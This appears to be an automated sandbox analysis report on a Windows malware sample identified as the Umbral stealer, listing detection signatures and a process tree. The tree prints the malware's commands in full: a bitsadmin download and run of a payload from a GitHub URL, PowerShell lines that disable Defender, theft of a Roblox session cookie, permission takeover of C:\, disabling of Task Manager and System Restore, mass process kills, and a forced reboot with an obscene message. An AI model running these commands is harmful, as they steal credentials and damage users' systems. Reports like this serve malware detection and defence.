Analysis
max time kernel: 105s
max time network: 115s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09-08-2024 10:50
Static task
static1
Behavioral task
behavioral1
Sample
test.exe
Resource
win10v2004-20240802-en
General
Target: test.exe
Size: 187KB
MD5: d6d75d536a2cff983197d333d0230a05
SHA1: cb3872741f661e1f483f7719619ec5c14db15e66
SHA256: cc13206ad514d61c7ea83f9380a571b93e23faafa829b04e877fcd38b4e83b75
SHA512: 1219ebdf6ffe7aad099b4af6b9d837acb8183f671736af0bc627fceb18ce69ae9301167afc56277cf20ec7c9fd9f8d537f755bad8fa33c84c8579499a4489c26
SSDEEP: 3072:wSV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPE6g0UasVmkoYcMKV:wHt5hBPi0BW69hd1MMdxPe9N9uA069Tx
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/4132-2-0x000001E377C10000-0x000001E377C50000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 5 IoCs
flow  pid   Process
33    952   WScript.exe
37    952   WScript.exe
66    2624  WScript.exe
67    2624  WScript.exe
69    2624  WScript.exe
pid Process 768 powershell.exe 4860 powershell.exe 812 powershell.exe 4960 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 1932 bitsadmin.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 872 takeown.exe 3284 icacls.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation test.exe
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation cmd.exe
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation WScript.exe
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation cmd.exe
Drops startup file 2 IoCs
description ioc Process
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat cmd.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat cmd.exe
Executes dropped EXE 1 IoCs
pid Process 1256 melter.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 872 takeown.exe 3284 icacls.exe -
Enumerates connected drives 3 TTPs 47 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow  ioc
26    raw.githubusercontent.com
42    discord.com
43    discord.com
25    raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 34 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 64 IoCs
Drops file in Program Files directory 2 IoCs
description ioc Process
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa cmd.exe
File opened for modification C:\Program Files\Java\jre-1.8\bin\server\classes.jsa cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language melter.exe
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4632 cmd.exe 3952 PING.EXE -
Delays execution with timeout.exe 2 IoCs
pid Process 1152 timeout.exe 1068 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4092 wmic.exe -
Kills process with taskkill 11 IoCs
pid   Process
1964  taskkill.exe
5000  taskkill.exe
2860  taskkill.exe
1792  taskkill.exe
4204  taskkill.exe
1900  taskkill.exe
3944  taskkill.exe
1664  taskkill.exe
2136  taskkill.exe
2364  taskkill.exe
1416  taskkill.exe
Modifies registry class 2 IoCs
description ioc Process
Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings cmd.exe
Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings cmd.exe
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3952 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc
HTTP User-Agent header 33 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header 37 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid   Process
4132  Umbral.exe
4960  powershell.exe
4960  powershell.exe
812   powershell.exe
812   powershell.exe
768   powershell.exe
768   powershell.exe
4976  powershell.exe
4976  powershell.exe
4860  powershell.exe
4860  powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2100 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\test.exe"C:\Users\Admin\AppData\Local\Temp\test.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\92BA.tmp\92BB.tmp\92BC.bat C:\Users\Admin\AppData\Local\Temp\test.exe"2⤵
- Checks computer location settings
- Drops startup file
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\system32\bitsadmin.exebitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe3⤵
- Download via BitsAdmin
PID:1932
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3144
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"4⤵
- Views/modifies file attributes
PID:2100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:1164
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:2180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4860
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:4092
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\system32\PING.EXEping localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3952
-
-
-
-
C:\Windows\system32\takeown.exetakeown /f C:\*.*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
C:\Windows\system32\icacls.exeIcacls C:\*.* /C /G Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3284
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:1640
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵PID:3116
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\32417.vbs"3⤵PID:3536
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21237.vbs"3⤵
- Blocklisted process makes network request
PID:952
-
-
C:\Windows\system32\timeout.exetimeout 603⤵
- Delays execution with timeout.exe
PID:1152
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll, SwapMouseButton3⤵PID:3732
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14070.vbs"3⤵PID:2896
-
-
C:\Windows\system32\timeout.exetimeout 143⤵
- Delays execution with timeout.exe
PID:1068
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM hl2.exe3⤵
- Kills process with taskkill
PID:1664
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM javaw.exe3⤵
- Kills process with taskkill
PID:2136
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM RobloxPlayerBeta.exe3⤵
- Kills process with taskkill
PID:1964
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM FortniteClient-Win64-Shipping.exe3⤵
- Kills process with taskkill
PID:5000
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM GenshinImpact.exe3⤵
- Kills process with taskkill
PID:2364
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM Among Us.exe3⤵
- Kills process with taskkill
PID:2860
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
PID:1416
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe3⤵
- Kills process with taskkill
PID:4204
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe3⤵
- Kills process with taskkill
PID:1900
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM iexplore.exe3⤵
- Kills process with taskkill
PID:1792
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM explorer.exe3⤵
- Kills process with taskkill
PID:3944
-
-
C:\Windows\system32\shutdown.exeshutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"3⤵PID:4500
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30130.vbs"3⤵
- Blocklisted process makes network request
- Enumerates connected drives
PID:2624
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23646.vbs"3⤵
- Enumerates connected drives
PID:4032
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8377.vbs"3⤵PID:2180
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- System Location Discovery: System Language Discovery
PID:2112
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1942.vbs" 12449.bat3⤵
- Checks computer location settings
PID:3116 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\12449.bat" "4⤵
- Checks computer location settings
- Modifies registry class
PID:4376 -
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:1340
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4796
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3224
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:1152
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:2656
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:1692
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5908
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5924
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5932
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5956
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5976
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5988
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6000
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6016
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6032
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6056
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6068
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6080
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6096
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6112
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6124
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5132
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5148
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5160
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5196
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5208
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5244
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5256
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5304
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5284
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5316
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5324
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5344
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5384
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5404
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5416
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5428
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5440
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5484
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5516
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5536
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5552
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5576
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5604
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5608
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5640
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5672
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5696
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5708
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5712
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5736
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5780
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5808
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5820
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5844
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5880
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5896
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5916
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5944
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5964
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5984
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5988
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6000
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6072
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6084
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6080
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6104
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6140
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5128
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5152
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5184
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5196
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5244
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5288
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5320
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5332
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5408
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5420
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5432
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5448
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5428
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5544
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5540
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5592
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5628
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5640
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5688
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5708
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5736
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5800
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5804
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5876
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5920
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5944
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5964
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5992
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6036
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:6076
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6072
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:3104
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5132
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5188
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5216
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5260
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5248
-
-
